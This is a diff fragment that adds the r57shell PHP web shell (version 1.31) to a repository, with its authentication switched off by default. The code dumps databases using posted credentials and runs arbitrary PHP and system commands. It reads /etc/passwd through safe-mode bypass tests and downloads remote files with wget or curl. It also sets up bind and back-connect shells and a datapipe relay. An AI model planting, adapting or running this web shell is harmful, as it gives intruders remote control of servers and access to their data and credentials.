+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2)))
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      }
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MySQL server";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2)))
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
+      echo " | - ".$row2['TABLE_NAME']."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      }
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }
+  @pg_close($db);
+  }
+ else echo "[-] ERROR! Can't connect to PostgreSQL server";
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MySQL server";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to PostgreSQL server";
+  break;
+  }
+ }
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></table>";
+}
+?>
diff --git a/php/r57shell.php b/php/r57shell.php
new file mode 100644
index 0000000..0a973e9
--- /dev/null
+++ b/php/r57shell.php
@@ -0,0 +1,2206 @@
+<?php
+/******************************************************************************************************/
+/*
+/*                                     #    #        #    #                             
+/*                                     #   #          #   #
+/*                                    #    #          #    #
+/*                                    #   ##   ####   ##   #
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##   ####   ##   ##
+/*                                   ###   ############   ###
+/*                                   ########################
+/*                                        ##############
+/*                                 ######## ########## #######
+/*                                ###   ##  ##########  ##   ###
+/*                                ###   ##  ##########  ##   ###
+/*                                 ###   #  ##########  #   ###
+/*                                 ###   ##  ########  ##   ###
+/*                                  ##    #   ######   #    ##
+/*                                   ##   #    ####   #    ##
+/*                                     ##                 ##
+/*
+/*
+/*
+/*  r57shell.php - ñêğèïò íà ïõï ïîçâîëÿşùèé âàì âûïîëíÿòü ñèñòåìíûå êîìàíäû íà ñåğâåğå ÷åğåç áğàóçåğ
+/*  Âû ìîæåòå ñêà÷àòü íîâóş âåğñèş íà íàøåì ñàéòå: http://rst.void.ru
+/*  Âåğñèÿ: 1.31
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  Îòäåëüíàÿ áëàãîäàğíîñòü çà ïîìîùü è èäåè: blf, phoenix, virus, NorD è âñåì ÷åğòÿì èç RST/GHC.
+/*  Åñëè ó Âàñ åñòü êàêèå-ëèáî èäåè ïî ïîâîäó òîãî êàêèå ôóíêöèè ñëåäóåò äîáàâèòü â ñêğèïò òî ïèøèòå
+/*  íà rst@void.ru. Âñå ïğåäëîæåíèÿ áóäóò ğàññìîòğåíû. 
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by 1dt.w0lf
+/*  RST/GHC http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+/* ~~~ Íàñòğîéêè | Options  ~~~ */
+
+// Âûáîğ ÿçûêà | Language
+// $language='ru' - ğóññêèé (russian)
+// $language='eng' - english (àíãëèéñêèé)
+$language='ru';
+
+// Àóòåíòèôèêàöèÿ | Authentification
+// $auth = 1; - Àóòåíòèôèêàöèÿ âêëş÷åíà  ( authentification = On  )
+// $auth = 0; - Àóòåíòèôèêàöèÿ âûêëş÷åíà ( authentification = Off )
+$auth = 0; 
+
+// Ëîãèí è ïàğîëü äëÿ äîñòóïà ê ñêğèïòó (Login & Password for access)
+// ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅĞÅÄ ĞÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅĞÂÅĞÅ!!! (CHANGE THIS!!!)
+// Ëîãèí è ïàğîëü øèôğóşòñÿ ñ ïîìîùüş àëãîğèòìà md5, çíà÷åíèÿ ïî óìîë÷àíèş 'r57'
+// Login & password crypted with md5, default is 'r57'
+$name='ec371748dc2da624b35a4f8f685dd122'; // ëîãèí ïîëüçîâàòåëÿ  (user login)
+$pass='ec371748dc2da624b35a4f8f685dd122'; // ïàğîëü ïîëüçîâàòåëÿ (user password)
+/******************************************************************************************************/
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = '1.31';
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  } 
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="r57shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
+   }
+}   
+$head = '<!-- Çäğàâñòâóé, Âàñÿ -->
+<html>
+<head>
+<title>r57shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+color: #000000;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+color: #000000;
+}
+.table1 {
+BORDER: 0px;
+BACKGROUND-COLOR: #D4D0C8;
+color: #000000;
+}
+.td1 {
+BORDER: 0px;
+font: 7pt Verdana;
+color: #000000;
+}
+.tr1 {
+BORDER: 0px;
+color: #000000;
+}
+table {
+BORDER:  #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+color: #000000;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+color: #000000;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+color: #000000;;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+color: #000000;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+color: #000000;
+}
+BODY {
+margin: 1px;
+color: #000000;
+background-color: #e4e0d8;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
